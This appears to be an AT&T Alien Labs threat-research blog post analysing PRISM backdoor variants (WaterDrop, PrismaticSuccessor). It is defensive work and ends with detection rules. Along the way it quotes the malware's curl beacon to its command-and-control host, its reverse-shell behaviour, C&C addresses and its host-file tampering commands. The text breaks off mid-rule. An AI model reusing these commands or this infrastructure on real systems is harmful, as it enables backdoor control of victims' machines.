					<a id="main-nav-partners" href="/partners" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#partners-dd">Partners<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="partners-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-partners-mobile" href="/partners/become-a-partner">Become a Partner</a></li>
							</ul>
							<div id="become-a-partner">
								<div class="menu-header">Become a Partner</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/partners">All Partner Programs</a></li>
									<li><a href="/partners/mssp-program">MSSP Program</a></li>
									<li><a href="/partners/resellers">Reseller Program</a></li>
									<li><a href="/partners/partner-portal/">Partner Portal Login</a></li>
								</ul>
							</div>

							<div id="find-a-partner">
								<div class="menu-header">Find a Partner</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/partners/find-partner">Find an MSSP</a></li>
									<li><a href="/partners/locator">Find a Reseller</a></li>
									<li><a href="/partners/certified-implementation-partners">Professional Services</a></li>
								</ul>
							</div>
							<div id="technology-partners">
								<div class="menu-header">Technology Partners</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/app">USM Anywhere Integrations</a></li>
									<li><a href="/partners/technology-partners">OTX Partners</a></li>
								</ul>
							</div>
						</div>
						<div class="dd-bottom visible-md visible-lg" id="view-all-partners">
							<div class="container-fluid">
								<a href="/partners/become-a-partner">
									<span class="view-all-text">Become a Partner &LongRightArrow;</span>
								</a>
							</div>
						</div>
					</div>
				</li>
				<li class="nav-item has-dd resources">
					<a id="main-nav-resources" href="/resource-center#language_en" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#resources-dd">Resources<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="resources-dd">
						<div class="dd-multi-col container-fluid">

							<div id="resources-menu-image" class="visible-lg">
								<img src="https://cdn-cybersecurity.att.com/images/uploads/thehub-thumbnail.jpg">
								<p>Explore The Hub, our home for all virtual experiences</p>
								<a href="https://hub.att.com/expo-hall/cybersecurity/">Explore now ⟶</a>
							</div>

							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-resources-mobile" href="/resource-center#language_en">View All Resources</a></li>

							</ul>

							<div id="product-resources">
								<div class="menu-header">Product Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#content_customer-stories">Customer Stories</a></li>
									<li><a href="/resource-center#content_product-brief">Product Briefs</a></li>
									<li><a href="/resource-center#content_product-demo">Product Demos</a></li>
									<li><a href="/resource-center#content_product-review">Product Reviews</a></li>
									<li><a href="/resource-center#content_solution-brief">Solution Briefs</a></li>
									<li><a href="/resource-center#content_use-cases">Use Cases</a></li>

									<li><a id="free-trial" href="/products/usm-anywhere/free-trial">Free Trial</a></li>
								</ul>
							</div>
							<div id="security-resources">
								<div class="menu-header">Security Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#content_analyst-reports">Analyst Reports</a></li>
									<li><a href="/blogs">Blogs</a></li>
									<li><a href="/resource-center#content_ebook">eBooks</a></li>
									<li><a href="/resource-center#content_video">Videos</a></li>
									<li><a href="/resource-center#content_webcast">Webcasts</a></li>
									<li><a href="/resource-center#content_white-paper">White Papers</a></li>
									<li><a href="/resource-center#content_industry-reports">Industry Reports</a></li>
								</ul>
							</div>
							<div id="customer-resources">
								<div class="menu-header">Customer Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="https://success.alienvault.com/">Success Center</a></li>
									<li><a href="/certification">Certification</a></li>
									<li><a href="/customer-success">Customer Success</a></li>
									<li><a href="/documentation">Documentation</a></li>
									<li><a href="/partners/certified-implementation-partners">Professional Services</a></li>
									<li><a href="/support">Support Overview</a></li>
									<li><a href="/training">Training</a></li>
								</ul>
							</div>
							<div id="browse-by-topic">
								<div class="menu-header">Browse by Topic</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#category_incident-response">Incident Response</a></li>
									<li><a href="/resource-center#category_intrusion-detection">Intrusion Detection</a></li>
									<li><a href="/resource-center#category_partner-mssp-reseller">Partner: MSSP &amp; Reseller</a></li>
									<li><a href="/resource-center#category_regulatory-compliance">Regulatory Compliance</a></li>
									<li><a href="/resource-center#category_soc">Security Operations Center</a></li>
									<li><a href="/resource-center#category_siem-log-management">SIEM &amp; Log Management </a></li>
									<li><a href="/resource-center#category_threat-detection">Threat Detection</a></li>
									<li><a href="/resource-center#category_threat-intelligence">Threat Intelligence</a></li>
								</ul>
							</div>
						</div>

						<div class="dd-bottom visible-md visible-lg" id="view-all-resources">
							<div class="container-fluid">
								<a href="/resource-center#language_en">
									<span class="view-all-text">View All Resources &LongRightArrow;</span>
								</a>
							</div>
						</div>

					</div>
				</li>
				<li class="nav-item alien-labs">
					<a id="main-nav-alien-labs" href="/alien-labs" class="">AT&T Alien Labs</a>
				</li>
				<li class="nav-item visible-sm visible-xs">
					<a id="main-nav-contact" href="/contact">Contact</a>
				</li>
				<li class="nav-item support visible-sm visible-xs">
					<a id="main-nav-support" href="/support">Support</a>
				</li>

			</ul>
		</nav>

	</div>

	<div class="container-fluid visible-md visible-lg">
		
		
			<a id="main-nav-free-tools" class="header-nav-btn btn margin-bottom10" href="/pricing/request-quote">Get price</a>
		


	</div>
</header>

						




			<main class="blog-detail flexible-layout">
		<section id="blog-top-subnav" class="category-subnav">
	<div class="container-fluid">
		<div class="row">
			<div class="blog-top-subnav-wrap">
				<ul id="blog-top-subnav-list">
					<li>Categories:</li>
					<li class=""><a
							href="/blogs">All blogs</a></li>
					<li class=""><a
							href="/blogs/security-essentials">Security essentials</a></li>
					<li class=""><a
							href="/blogs/labs-research">AT&T Alien Labs research</a></li>
				</ul>
				<div class="blog-top-subnav-mobile-wrap">
					<a href="#" class="ddm-toggle collapsed" data-toggle="collapse"
						data-target="#blog-top-subnav-mobile">Categories <i class="down"></i></a>
					<ul id="blog-top-subnav-mobile" class="collapse">
						<li class=""><a
							href="/blogs">All blogs</a></li>
						<li class=""><a
								href="/blogs/security-essentials">Security essentials</a></li>
						<li class=""><a
								href="/blogs/labs-research">AT&T Alien Labs research</a></li>
					</ul>
				</div>
			</div>
		</div>
	</div>
</section>

				<section class="full-width-block">

					<div class="container-fluid">

						<div class="row flx-container">
							<div class="col-sm-7">
								<div class="blog-content-area">
									<div class="section-breadcrumb">
										  <ol class="m-bread-crumb-list l-bread-crumb-list" itemscope="" itemtype="http://schema.org/BreadcrumbList">

											  <li itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem">
												  <a itemprop="item" href="https://cybersecurity.att.com">
													  <span itemprop="name" style="padding-right: 10px;">AT&T Cybersecurity</span> <span class="glyphicon glyphicon-chevron-right"></span></a>
												  <meta itemprop="position" content="1">
											  </li>
											  <li itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem">
												  <a itemprop="item" href="https://cybersecurity.att.com/blogs">
													  <span itemprop="name" style="padding-left: 10px;">Blog</span></a>
												  <meta itemprop="position" content="2">
											  </li>
										  </ol>
									  </div>
									<div class="blog-title-date-author-area">
										<h1>PRISM attacks fly under the radar</h1>
										<div class="date">August 23, 2021 &nbsp;|&nbsp; <a href="/blogs/author/fernando-dominguez">Fernando Dominguez</a></div>
									</div>
									<div class="blog-body">
										<h2>Executive summary</h2>

<p><a href="https://cybersecurity.att.com/alien-labs" target="_blank">AT&amp;T Alien Labs</a> has recently discovered a cluster of Linux ELF executables that have low or zero anti-virus detections in VirusTotal (see example in figure 1), though our internal threat analysis systems have flagged them as malicious. &nbsp;Upon inspection of the samples, Alien Labs has identified them as modifications of the open-source PRISM backdoor used by multiple threat actors in various campaigns.</p>

<p>We have conducted further investigation of the samples and discovered that several campaigns using these malicious executables have managed to remain active and under the radar for more than 3.5 years. The oldest samples Alien Labs can attribute to one of the actors date from the 8th of November, 2017.</p>

<p><img alt="PRISM in VirusTotal" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_in_VT.jpg" /></p>

<p style="text-align:center">Figure 1. PRISM sample marked as clean in VirusTotal, as captured by Alien Labs.</p>

<h2>Analysis</h2>

<p><b>WaterDrop</b></p>

<p>The WaterDrop variant is easily identifiable as it includes a function named xencrypt which performs XOR encryption with the hard-coded single-byte 0x1F key. Starting in version 7 of the WaterDrop variant, samples include the plain-text string &ldquo;WaterDropx vX started&rdquo;, where X is the integer version number. So far, we have observed versions 1, 2.2, and 3 still using the name PRISM. Versions 7, 9, and 12 are named WaterDropx.</p>

<p>It also uses the easily identifiable User Agent string &ldquo;<i>agent-waterdropx</i>&rdquo; for the HTTP-based command and control (C&amp;C) communications, and it reaches to subdomains of the waterdropx[.]com domain.</p>

<p>While all these may seem to be fairly obvious indicators, the threat actor behind this variant has managed to maintain a zero or almost-zero detection score in VirusTotal for its samples and domains. This is most likely due to their campaigns being fairly small in size. The waterdropx[.]com domain was registered to the current owner on August 18, 2017, and as of August 10, 2021, it was still online.</p>

<p>Besides the base PRISM features, WaterDrop introduces XOR encryption for the configuration and an additional process that regularly queries the C&amp;C for commands to execute (see figure 2).</p>

<p style="text-align:center"><img alt="PRISM C&amp;C" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_CC.png" /></p>

<p style="text-align:center">Figure 2. Function to query C&amp;C for commands</p>

<p>This communication with the C&amp;C server is plain-text HTTP, and it is performed via the curl command. In all the versions Alien Labs has observed, the option -A &ldquo;agent-waterdropx&rdquo; is used, meaning the User Agent header will remain constant across versions.</p>

<p>We have also observed some samples of this variant that load a Kernel Module if the process is executed with root privileges (see figure 3).</p>

<p><img alt="Waterdrop ko" data-original="https://cdn-cybersecurity.att.com/blog-content/waterdrop_ko.jpg" /></p>

<p style="text-align:center">Figure 3. Installing the waterdrop.ko Kernel Module</p>

<h3>Version evolution</h3>

<p><strong>PRISM v1</strong></p>

<p>Alien Labs has found samples tagged as &ldquo;PRISM v1&rdquo; that we can attribute to the same threat actor with high confidence as they use the same C&amp;C domain (waterdropx[.]com). The samples also share distinctive features such as the agent-waterdropx User Agent string.</p>

<p>Compared to the public PRISM, this version introduces the creation of a child process that constantly queries the C&amp;C server for commands to execute. The initial request to the C&amp;C server is performed by the following command:</p>

<pre>
curl -A &#39;agent-waterdropx&#39; &#39;http://r.waterdropx[.]com:13858/tellmev2.x?v=1&amp;act=touch&#39;</pre>

<p>PRISM v1 does not feature any kind of obfuscation, packing, or encryption of the binaries.</p>

<p><strong>PRISM v2.2</strong></p>

<p>PRISM&nbsp; v2.2 introduces the usage of XOR encryption to obfuscate sensitive data, such as the BASH command strings used. The key is a single byte, and it is hard coded to the 0x1F value. This particular key is used across all the samples from this threat actor we observed.</p>

<p>For this version, the initial C&amp;C URI request format is:</p>

<pre>
/tellmev2.x?v=2.2&amp;act=touch</pre>

<p><strong>PRISM v3</strong></p>

<p>PRISM v3 is identical to v2.2, with one exception: clients include a bot id for identification purposes. This bot id is saved to /etc/.xid and used in the malware beacon (see figure 4).</p>

<p style="text-align:center"><img alt="PRISM bot ID" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_bot_id.jpg" /></p>

<p style="text-align:center">Figure 4. Usage of bot id</p>

<p>The initial request format is:</p>

<pre>
/tellmev2.x?v=3&amp;act=touch&amp;xid=<botid></botid></pre>

<p><strong>Waterdrop v7</strong></p>

<p>Waterdrop v7 introduces the use of a Kernel Module that is installed using insmod if the process has root privileges. The code responsible for this task can be seen in Figure 3. We have not yet been able to retrieve the Kernel Module for analysis. Therefore, we are not able to determine the purpose of this payload.</p>

<p>The rest of the code is identical to PRISM v3, only changing the hard-coded version value.</p>

<p>As such, the initial request format is:</p>

<pre>
/tellmev2.x?v=7&amp;act=touch&amp;xid=<botid></botid></pre>

<p><strong>Waterdrop v9</strong></p>

<p>Continuing the trend of previous versions, the changes on Waterdrop v9 are minimal. The only change found in this version is that instead of using a hard-coded ICMP password, the bot uses its own bot id as ICMP password to spawn reverse shells.</p>

<p>The initial request format is:</p>

<pre>
/tellmev2.x?v=9&amp;act=touch&amp;xid=<botid></botid></pre>

<p><strong>Waterdrop v12</strong></p>

<p>Waterdrop v12 is almost identical to its predecessors, with an enhancement to the backdoor stability. As such, the initial request format is:</p>

<pre>
/tellmev2.x?v=12&amp;act=touch&amp;xid=<botid></botid></pre>

<h2>AT&amp;T Alien Labs discovers malware family &ldquo;PrismaticSuccessor&rdquo;</h2>

<p>Alien Labs began its research investigating the z0gg[.]me domain. Said domain resolves to an IP address that is shared by another twelve domains (see figure 5).</p>

<p style="text-align:center"><img alt="PRISM overlapping domains" data-original="https://cdn-cybersecurity.att.com/blog-content/prism_overlapping_domains.jpg" /></p>

<p style="text-align:center">Figure 5. Domain overlaps for target address</p>

<p>Some of the overlapping domains are known PRISM C&amp;C domains, however, z0gg[.]me is contacted by <a href="https://otx.alienvault.com/indicator/domain/z0gg.me" target="_blank">several samples</a>&nbsp;that also reach out to github.com. Particularly, samples were observed contacting the &ldquo;https://github.com/lirongchun/i&rdquo; repository.</p>

<p>In this repository we can observe the following files.</p>

<ul>
	<li>Three documents containing an IP address (README.md) and a port number (README1.md and MP.md).</li>
	<li>A bash script for dirty cow (CVE-2016-5195) exploitation, named &ldquo;111.&rdquo;</li>
</ul>

<ul>
	<li>Several ELF binaries, including:
	<ul>
		<li>git: A custom malware implant</li>
		<li>ass: The open-source security tool named <a href="https://github.com/gopherst/hidemyass" target="_blank">&ldquo;hide my ass&rdquo;</a>&nbsp;compiled for the x64 architecture</li>
		<li>ass32: The open-source security tool named &ldquo;hide my ass&rdquo; compiled for the x86 architecture</li>
	</ul>
	</li>
</ul>

<p>As the actor is using a public git repository to host its malware and infrastructure information, we can obtain the historical data and see its evolution.</p>

<p>For example, we can gather all the IP addresses that the actor has used as C&amp;C servers with the following command:</p>

<pre>
$ git log -p README.md |grep "^+"|grep -v "+++"&#10;&#10;+45.199.88[.]86&#10;&#10;+154.48.227[.]27&#10;&#10;+207.148.118[.]141&#10;&#10;+154.48.227[.]27&#10;&#10;+165.22.136[.]80&#10;&#10;+154.48.227[.]27&#10;&#10;+156.236.110[.]79&#10;&#10;+43.230.11[.]125&#10;&#10;+172.247.127[.]136&#10;&#10;+127.0.0[.1]&#10;&#10;+192.168.3[.]173&#10;&#10;+192.168.3[.]173:80&#10;&#10;+192.168.3[.]173&#10;&#10;+118.107.180[.]8&#10;&#10;+s.rammus[.]me&#10;&#10;+s.rammus[.]me:80&#10;&#10;+192.168.3[.]150:80&#10;&#10;+192.168.3[.]150^80&#10;&#10;+192.168.3[.]150^&#10;&#10;+^192.168.3[.]150&#10;&#10;+^192.168.3[.]133&#10;&#10;It is also notable that the malware implant has received several updates over time. We can pull all the binaries uploaded to the repository that are not open-source security tools, as listed here:&#10;&#10;1.1M        MP.out&#10;&#10;15K         git&#10;&#10;15K         git (1)&#10;&#10;15K         git (2)&#10;&#10;16K         git (3)&#10;&#10;1.1M        git (4)&#10;&#10;1.1M        git (5)&#10;&#10;15K         git443&#10;&#10;16K         git53&#10;&#10;1.1M        gitest&#10;&#10;11K         hostname&#10;&#10;12K         ps&#10;&#10;10K         wm&#10;&#10;12K         wm (1)&#10;&#10;14K         wm32&#10;&#10;15K         wmgithub&#10;&#10;&#10;$ shasum -a 256 *&#10;&#10;&#10;933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657  MP.out&#10;&#10;f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188  git&#10;&#10;eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d  git (1)&#10;&#10;3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a  git (2)&#10;&#10;3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8  git (3)&#10;&#10;cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824  git (4)&#10;&#10;baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531  git (5)&#10;&#10;eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f  git443&#10;&#10;d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278  git53&#10;&#10;77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63  gitest&#10;&#10;1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017  hostname&#10;&#10;7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473  ps&#10;&#10;1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a  wm&#10;&#10;6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46  wm (1)&#10;&#10;e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4  wm32&#10;&#10;b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920  wmgithub</pre>

<p>Grouping them by size we observed two different clusters: 1) one containing samples that are around 15K and 2) ones that are around 1.1MB. After a quick triage, we assessed that the light-weight binaries are standard PRISM backdoors, while the bigger sized binaries belong to another malware family. Given the git&rsquo;s history, we were able to observe how the actor started using the PRISM backdoor for their operative, and then on July 16, 2019, switched to the custom implant in commit 6055e31cc87679a7198e1143d1eddcdfc9313816. It is also notable that this custom implant&rsquo;s binaries are packed using a modified version of UPX.</p>

<p>The following binary analysis of said custom implants uses sample with SHA256 aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5 as a reference.</p>

<p><img alt="PRISM evolution" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_evolution.jpg" /></p>

<p style="text-align:center">Figure 6. Detection evolution for analyzed sample</p>

<p>The binaries from this particular malware family are quite large in size (1-3 MB compared to the ~15KB of the typical PRISM binary). This is due to the binaries having libcurl statically compiled into them, which is evident due to the presence of known libcurl strings. We have named this malware family &ldquo;PrismaticSuccessor.&rdquo;</p>

<p>By decompiling the main function, Alien Labs observed that the binary takes an optional parameter. If said parameter is the character &ldquo;9,&rdquo; it prints the configuration. For these binaries, the configuration consists of two URLs: 1) HostUrl is used to fetch the C&amp;C host and 2) PortUrl is used to fetch the port number to contact the previous host on.</p>

<p>We have also observed that immediately after these actions, the malware attempts to open and lock /var/lock/sshd.lock. If it fails to do so, it fakes a segmentation fault. This procedure ensures that the malware is not already running in the machine (see figure 7).</p>

<p><img alt="PRISM configuration" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_configuration.jpg" /></p>

<p style="text-align:center">Figure 7. Configuration and lock check</p>

<p>Next, the malware decrypts a string containing a process name, which is used to overwrite &ldquo;argv&rdquo;. This technique avoids using prctl. The possible command line arguments are also smashed and replaced by the whitespace character (see figure 8).</p>

<p style="text-align:center"><img alt="argv smashing" data-original="https://cdn-cybersecurity.att.com/blog-content/Argv_smashing.jpg" /></p>

<p style="text-align:center">Figure 8. Argv smashing</p>

<p>Note that the aMcwfkvf variable contains the &ldquo;[mcwfkvf]&rdquo; value, which is decrypted to &ldquo;[kauditd]&rdquo; in &ldquo;src.&rdquo; The decryption routine is ROT13 with -2 as key. This particular ROT13 only rotates lower- and upper-case letters, not symbols or numbers (see figure 9).</p>

<p><img alt="rot13 implementation" data-original="https://cdn-cybersecurity.att.com/blog-content/rot13_implementation.jpg" /></p>

<p style="text-align:center">Figure 9. ROT13 implementation</p>

<p>The above actions conclude the environment setup process for the malware. Next, the malicious activity begins, which includes spawning child processes, so the malware can multitask. This also makes it harder to trace the malware (see figure 10).</p>

<p style="text-align:center"><img alt="PRISM malicious activity loop" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_malicious_activity_loop.jpg" /></p>

<p style="text-align:center">Figure 10. Malicious activity loop</p>

<p>Spawning child processes:</p>

<p>The first fork terminates the parent and only lets the child continue &ndash; the first-order child.</p>

<p>First-Order Child. This first-order child will fork again, spawning a second order child. The first order child will execute the &ldquo;While&rdquo; loop body endlessly, spawning three additional child processes (third-order childs). The second order child will contact the fallback C&amp;C server.</p>

<p>Second-Order Child. The second-order child will open a reverse shell session to a fallback hard-coded C&amp;C server. The sample ships with up to three C&amp;C addresses, encrypted with ROT13. These addresses attempt to resolve via gethostbyname. The first one that resolves successfully is contacted on TCP port 80. For this particular sample, the secondary C&amp;C address list is &ldquo;z0gg.me&rdquo;, &ldquo;x63.in&rdquo; and &ldquo;x47.in.&rdquo; (See figure 11.)</p>

<p><img alt="ROT13 encrypted c&amp;c" data-original="https://cdn-cybersecurity.att.com/blog-content/ROT13_encrypted_cc.jpg" /></p>

<p style="text-align:center">Figure 11. ROT13 encrypted C&amp;C list</p>

<p>The server is also required to reply with a password in order for the reverse shell to be successfully established. However, the required password is not shipped in the binary. Instead, the malware calculates the MD5 hash of the replied buffer and compares it to the hard-coded value &ldquo;ef4a85e8fcba5b1dc95adaa256c5b482&rdquo;.</p>

<p>This communication is performed whether the primary C&amp;C server is successfully contacted or not. The primary C&amp;C server does not include a password mechanism. (See figure 12.)_</p>

<p style="text-align:center"><img alt="PRISM secondary c&amp;c" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_secondary_cc.jpg" /></p>

<p style="text-align:center">Figure 12. Secondary command and control server contact</p>

<p>The first of the third-order child processes gets the C&amp;C host and port from github and opens a reverse shell to the IP:PORT indicated in those URLs (see figure 13 and 14).</p>

<p><img alt="PRISM c&amp;c host" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_cc_host.jpg" /></p>

<p style="text-align:center">Figure 13. Obtaining C&amp;C host from github</p>

<p><img alt="PRISM  c&amp;c port" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_cc_port.jpg" /></p>

<p style="text-align:center">Figure 14. Obtaining C&amp;C port from github</p>

<p>The function to spawn a shell to a host is very similar to the one found in PRISM&rsquo;s source code, if not identical (see figure 15 and 16).</p>

<p><img alt="PRISM shell session spawned" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_shell_session.jpg" /></p>

<p style="text-align:center">Figure 15. Spawning a shell session to C&amp;C</p>

<p><img alt="PRISM reverse shell" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_reverse_shell.jpg" /></p>

<p style="text-align:center">Figure 16. PRISM function to spawn the reverse shell session</p>

<p>If it fails to spawn the shell, the child dies and the whole process will be reattempted in 15 seconds.</p>

<p>The other two third-order child processes jump to shellcode routines. These routines are encrypted with a hard-coded 8-byte XOR key and include a small self-decrypting stub (see figures 17 and 18).</p>

<p><img alt="PRISM first shellcode" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_first_shellcode.jpg" /></p>

<p style="text-align:center">Figure 17. First shellcode routine</p>

<p>Each of these routines build a command in the stack and launch it. For the analyzed sample the commands were /bin/sh -c sed -i "/\\(z0gg.me\\|x63.in\\)/d" /etc/hosts and /bin/sh -c "grep -q &#39;nameserver 8.8.8.8&#39; /etc/resolv.conf||echo &#39;nameserver 8.8.8.8&#39; &gt;&gt; /etc/resolv.conf". (See figure 18.)</p>

<p><img alt="PRISM emulated stack" data-original="https://cdn-cybersecurity.att.com/blog-content/prism_emulated_stack.jpg" /></p>

<p style="text-align:center">Figure 18. Emulated stack with example command string</p>

<p>When Alien Labs searched for the obtained command lines, we got an <a href="https://unix.stackexchange.com/questions/561525/linux-suspicious-process-spawn-by-init" target="_blank">interesting result in StackOverflow</a>&nbsp;where a user complains about a suspicious process in their machine. This indicates that the threat is being used in the wild.</p>

<h2>Other variants</h2>

<p>We have observed other actors using the PRISM backdoor for their operations. However, in the majority of these cases, the actor(s) use the original PRISM backdoor as is, without performing any major modifications. This fact, combined with the open-source nature of the backdoor, impedes us from properly tracking the actor(s) activity.</p>

<h2>Conclusion</h2>

<p>PRISM is an open-source simplistic and straightforward backdoor. Its traffic is clearly identifiable and its binaries are easy to detect. Despite this, PRISM&rsquo;s binaries have been undetected until now, and its C&amp;C server has remained online for more than 3.5 years. This shows that while bigger campaigns that receive more attention are usually detected within hours, smaller ones can slip through.</p>

<p>Alien Labs expects the adversaries to remain active and conduct operations with this toolset and infrastructure. We will continue to monitor and report any noteworthy findings.</p>

<h2>Detection methods</h2>

<p>The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.</p>
<div class="table-responsive">
<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px;padding:24px;">
			<p>SURICATA IDS SIGNATURES</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px;padding:24px;">
			<pre>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"AV TROJAN WaterDropX CnC Beacon"; flow:established,to_server; content:"GET"; http_method; content:"v="; http_uri; content:"act="; http_uri; content:"agent-waterdropx"; http_user_agent; startswith; endswith; reference:md5,5b714b1eb765493f2ff77e068a7c1a4f; classtype:trojan-activity; sid:4002615; rev:1;)</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>

<p>&nbsp;</p>

<div class="table-responsive">
	<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>OSQUERY QUERIES</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SELECT path as file_name, directory as file_path, uid as source_userid, gid as user_group_id, &#39;WaterDropx backdoor&#39; as malware_family from file WHERE path = &#39;/etc/.xid&#39;;</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>
<p>&nbsp;</p>

<div class="table-responsive">
	<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; width:552px">
			<p>YARA RULES</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; width:552px">
			<pre>
rule PRISM {&#10;&#10;    meta:&#10;&#10;        author = "AlienLabs"&#10;&#10;        description = "PRISM backdoor"&#10;&#10;        reference = "https://github.com/andreafabrizi/prism/blob/master/prism.c"&#10;&#10;&#10;    strings:&#10;&#10;        $s1 = "I&#39;m not root :("&#10;&#10;        $s2 = "Flush Iptables:\t"&#10;&#10;        $s3 = " Version:\t\t%s\n"&#10;&#10;        $s4 = " Shell:\t\t\t%s\n"&#10;&#10;        $s5 = " Process name:\t\t%s\n"&#10;&#10;        $s6 = "iptables -F 2&gt; /dev/null"&#10;&#10;        $s7 = "iptables -P INPUT ACCEPT 2&gt; /dev/null"&#10;&#10;        $s8 = " started\n\n# "&#10;&#10;&#10;        $c1 = {&#10;&#10;            E8 [4] 8B 45 ?? BE 00 00 00 00 89 C7 E8 [4] 8B 45 ?? BE 01 00 00 00&#10;&#10;            89 C7 E8 [4] 8B 45 ?? BE 02 00 00 00 89 C7 E8 [4] BA 00 00 00 00&#10;&#10;            BE [4] BF [4] B8 00 00 00 00 E8&#10;&#10;        }&#10;&#10;        $c2 = {&#10;&#10;            BA 00 00 00 00&#10;&#10;            BE 01 00 00 00&#10;&#10;            BF 02 00 00 00&#10;&#10;            E8 [4]&#10;&#10;            89 45 [1]&#10;&#10;            83 ?? ?? 00&#10;&#10;        }&#10;&#10;&#10;    condition:&#10;&#10;        uint32(0) == 0x464C457F and&#10;&#10;        filesize &lt; 30KB and&#10;&#10;        (4 of ($s*) or all of ($c*))&#10;&#10;}</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; width:552px">
			<pre>
rule PrismaticSuccessor : LinuxMalware&#10;&#10;{&#10;&#10;   meta:&#10;&#10;       author = "AlienLabs"&#10;&#10;       description = "Prismatic Successor malware backdoor"&#10;&#10;       reference = "aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5"&#10;&#10;       copyright = "Alienvault Inc. 2021"&#10;&#10;&#10;   strings:&#10;&#10;       $s1 = "echo -e \""&#10;&#10;       $s2 = "[\x1B[32m+\x1B[0m]`/bin/hostname`"&#10;&#10;       $s3 = "[\x1B[32m+\x1B[0m]`/usr/bin/id`"&#10;&#10;       $s4 = "[\x1B[32m+\x1B[0m]`uname -r`"&#10;&#10;       $s5 = "[+]HostUrl-&gt;\t%s\n"&#10;&#10;       $s6 = "[+]PortUrl-&gt;\t%s\n"&#10;&#10;       $s7 = "/var/run/sshd.lock"&#10;&#10;&#10;       $shellcode = {&#10;&#10;           48 31 C9&#10;&#10;           48 81 E9 [4]&#10;&#10;           48 8D 05 [4]&#10;&#10;           48 BB [8]&#10;&#10;           48 31 [2]&#10;&#10;           48 2D [2-4]&#10;&#10;           E2 F4&#10;&#10;       }&#10;&#10;&#10;       $c1 = {&#10;&#10;           8B 45 ??&#10;&#10;           BE 00 00 00 00&#10;&#10;           89 C7&#10;&#10;           E8 [4]&#10;&#10;           8B 45 ??&#10;&#10;           BE 01 00 00 00&#10;&#10;           89 C7&#10;&#10;           E8 [4]&#10;&#10;           8B 45 ??&#10;&#10;           BE 02 00 00 00&#10;&#10;           89 C7&#10;&#10;           E8 [4]&#10;&#10;           8B 45 ??&#10;&#10;           BA [4]&#10;&#10;           BE 